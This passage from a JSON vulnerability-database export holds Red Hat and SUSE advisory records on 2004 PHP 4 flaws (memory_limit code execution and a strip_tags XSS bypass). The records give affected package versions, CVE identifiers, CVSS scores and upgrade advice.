"2017-07-29T20:34:33", "href": "https://access.redhat.com/errata/RHSA-2004:342", "id": "RHSA-2004:342", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-08-02T22:57:49", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "enchantments_done": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "packageVersion": "4.3.2-11.1.ent", "packageFilename": "php-4.3.2-11.1.ent.ia64.rpm", "packageName": "php", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "4.3.2-11.1.ent", "packageFilename": "php-imap-4.3.2-11.1.ent.ia64.rpm", "packageName": "php-imap", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "4.3.2-11.1.ent", "packageFilename": "php-ldap-4.3.2-11.1.ent.ia64.rpm", "packageName": "php-ldap", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "4.3.2-11.1.ent", "packageFilename": "php-mysql-4.3.2-11.1.ent.ia64.rpm", "packageName": "php-mysql", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "4.3.2-11.1.ent", "packageFilename": "php-odbc-4.3.2-11.1.ent.ia64.rpm", "packageName": "php-odbc", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "4.3.2-11.1.ent", "packageFilename": "php-pgsql-4.3.2-11.1.ent.ia64.rpm", "packageName": "php-pgsql", "arch": "ia64", "operator": "lt"}], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP server.\n\nStefan Esser discovered a flaw when memory_limit is enabled in versions of\nPHP 4 before 4.3.8. If a remote attacker could force the PHP interpreter to\nallocate more memory than the memory_limit setting before script execution\nbegins, then the attacker may be able to supply the contents of a PHP hash\ntable remotely. This hash table could then be used to execute arbitrary\ncode as the 'apache' user. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2004-0594 to this issue.\n\nThis issue has a higher risk when PHP is running on an instance of Apache\nwhich is vulnerable to CAN-2004-0493. For Red Hat Enterprise Linux 3, this\nApache memory exhaustion issue was fixed by a previous update,\nRHSA-2004:342. It may also be possible to exploit this issue if using a\nnon-default PHP configuration with the \"register_defaults\" setting is\nchanged to \"On\". Red Hat does not believe that this flaw is exploitable in\nthe default configuration of Red Hat Enterprise Linux 3.\n\nStefan Esser discovered a flaw in the strip_tags function in versions of\nPHP before 4.3.8. The strip_tags function is commonly used by PHP scripts\nto prevent Cross-Site-Scripting attacks by removing HTML tags from\nuser-supplied form data. By embedding NUL bytes into form data, HTML tags\ncan in some cases be passed intact through the strip_tags function, which\nmay allow a Cross-Site-Scripting attack. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2004-0595 to\nthis issue. \n\nAll users of PHP are advised to upgrade to these updated packages, which\ncontain backported patches that address these issues.", "reporter": "RedHat", "published": "2004-07-19T04:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "title": "(RHSA-2004:392) php security update", "type": "redhat", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0493", "CVE-2004-0594", "CVE-2004-0595"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-07-29T20:35:20", "href": "https://access.redhat.com/errata/RHSA-2004:392", "id": "RHSA-2004:392", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-09-04T11:22:50", "references": [], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "x86_64", "packageFilename": "php4-mysql-4.3.4-43.11.x86_64.rpm", "packageName": "php4-mysql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.0", "packageVersion": "4.3.3-177", "arch": "i586", "packageFilename": "mod_php4-4.3.3-177.i586.rpm", "packageName": "mod_php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.2", "packageVersion": "4.3.1-169", "arch": "i586", "packageFilename": "mod_php4-core-4.3.1-169.i586.rpm", "packageName": "mod_php4-core", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.0", "packageVersion": "4.3.3-177", "arch": "i586", "packageFilename": "mod_php4-servlet-4.3.3-177.i586.rpm", "packageName": "mod_php4-servlet", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "i586", "packageFilename": "php4-4.3.4-43.11.i586.rpm", "packageName": "php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.1", "packageVersion": "4.2.2-479", "arch": "i586", "packageFilename": "mod_php4-servlet-4.2.2-479.i586.rpm", "packageName": "mod_php4-servlet", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "i586", "packageFilename": "php4-imap-4.3.4-43.11.i586.rpm", "packageName": "php4-imap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.1", "packageVersion": "4.2.2-479", "arch": "i586", "packageFilename": "mod_php4-core-4.2.2-479.i586.rpm", "packageName": "mod_php4-core", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "i586", "packageFilename": "php4-servlet-4.3.4-43.11.i586.rpm", "packageName": "php4-servlet", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.0", "packageVersion": "4.3.3-177", "arch": "x86_64", "packageFilename": "mod_php4-servlet-4.3.3-177.x86_64.rpm", "packageName": "mod_php4-servlet", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "x86_64", "packageFilename": "php4-session-4.3.4-43.11.x86_64.rpm", "packageName": "php4-session", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "x86_64", "packageFilename": "php4-wddx-4.3.4-43.11.x86_64.rpm", "packageName": "php4-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.0", "packageVersion": "4.1.0-317", "arch": "i386", "packageFilename": "mod_php4-core-4.1.0-317.i386.rpm", "packageName": "mod_php4-core", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.0", "packageVersion": "4.3.3-177", "arch": "x86_64", "packageFilename": "mod_php4-4.3.3-177.x86_64.rpm", "packageName": "mod_php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.0", "packageVersion": "4.1.0-317", "arch": "i386", "packageFilename": "mod_php4-4.1.0-317.i386.rpm", "packageName": "mod_php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "i586", "packageFilename": "php4-session-4.3.4-43.11.i586.rpm", "packageName": "php4-session", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "i586", "packageFilename": "php4-wddx-4.3.4-43.11.i586.rpm", "packageName": "php4-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.1", "packageVersion": "4.2.2-479", "arch": "i586", "packageFilename": "mod_php4-4.2.2-479.i586.rpm", "packageName": "mod_php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "i586", "packageFilename": "php4-mysql-4.3.4-43.11.i586.rpm", "packageName": "php4-mysql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "x86_64", "packageFilename": "php4-4.3.4-43.11.x86_64.rpm", "packageName": "php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "x86_64", "packageFilename": "php4-servlet-4.3.4-43.11.x86_64.rpm", "packageName": "php4-servlet", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.0", "packageVersion": "4.3.3-177", "arch": "x86_64", "packageFilename": "mod_php4-core-4.3.3-177.x86_64.rpm", "packageName": "mod_php4-core", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "x86_64", "packageFilename": "php4-imap-4.3.4-43.11.x86_64.rpm", "packageName": "php4-imap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.0", "packageVersion": "4.3.3-177", "arch": "i586", "packageFilename": "mod_php4-core-4.3.3-177.i586.rpm", "packageName": "mod_php4-core", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.2", "packageVersion": "4.3.1-169", "arch": "i586", "packageFilename": "mod_php4-4.3.1-169.i586.rpm", "packageName": "mod_php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.0", "packageVersion": "4.1.0-317", "arch": "i386", "packageFilename": "mod_php4-servlet-4.1.0-317.i386.rpm", "packageName": "mod_php4-servlet", "operator": "lt"}], "description": "PHP is a well known, widely-used scripting language often used within web server setups. Stefan Esser found a problem with the \"memory_limit\" handling of PHP which allows remote attackers to execute arbitrary code as the user running the PHP interpreter. This problem has been fixed. Additionally a problem within the \"strip_tags\" function has been found and fixed which allowed remote attackers to inject arbitrary tags into certain web browsers, issuing XSS related attacks. Since there is no easy workaround except disabling PHP, we recommend an update for users running the PHP interpreter within the apache web server.", "edition": 1, "reporter": "Suse", "published": "2004-07-16T12:43:18", "title": "remote code execution in php4/mod_php4", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0493", "CVE-2004-0398", "CVE-2004-0595", "CVE-2004-0179", "CVE-2004-0594"], "modified": "2004-07-16T12:43:18", "id": "SUSE-SA:2004:021", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-07/msg00004.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}}